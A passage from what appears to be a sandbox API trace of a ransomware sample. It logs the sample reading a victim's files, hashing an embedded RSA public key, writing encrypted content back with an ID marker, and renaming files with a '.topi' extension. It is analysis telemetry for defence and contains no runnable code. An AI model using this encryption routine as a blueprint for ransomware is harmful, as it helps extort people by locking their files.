halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\ljbw4xnuu9yf6r\\vy2c4p2qphqxkhm5m.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\LJBw4XnUu9Yf6R\\vy2c4P2Qphqxkhm5M.mkv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\ljbw4xnuu9yf6r\\vy2c4p2qphqxkhm5m.mkv.topi")) returned 1 [0097.778] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\LJBw4XnUu9Yf6R\\Ya_jFoXRTk6bq.swf") returned=".swf" [0097.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\LJBw4XnUu9Yf6R\\Ya_jFoXRTk6bq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\ljbw4xnuu9yf6r\\ya_jfoxrtk6bq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.779] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=52198) returned 1 [0097.779] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.782] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xcbc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.782] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.783] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.783] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xcbe6, lpOverlapped=0x0) returned 1 [0097.783] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.783] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.783] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.783] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.783] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.784] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.784] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.784] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.784] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.784] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.784] GetLastError () returned 0x0 [0097.784] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.784] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.784] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.784] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.784] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.784] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.784] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.784] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.784] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xcbf0) returned 0x9a06a00 [0097.785] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb968 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f70 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb9b0 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f88 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fb8 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fd0 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.785] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fb8 | out: hHeap=0x680000) returned 1 [0097.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fd0 | out: hHeap=0x680000) returned 1 [0097.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.785] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4fd0 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.785] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4fb8 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fd0 | out: hHeap=0x680000) returned 1 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fb8 | out: hHeap=0x680000) returned 1 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.786] GetCurrentThreadId () returned 0x8c4 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa2b0 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.786] GetCurrentThreadId () returned 0x8c4 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.786] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.786] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fb8 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fd0 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fa0 [0097.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4fe8 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fb8 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fb8 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fb8 | out: hHeap=0x680000) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.788] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fe8 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fd0 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fa0 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f88 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb9b0 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.790] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xcbe1, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xcbe1, lpOverlapped=0x0) returned 1 [0097.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.790] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xcbe6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.790] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.790] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.790] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.790] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.791] CloseHandle (hObject=0x6a8) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x3134738 [0097.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8d0) returned 0x31cf750 [0097.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134738 | out: hHeap=0x680000) returned 1 [0097.792] MoveFileW 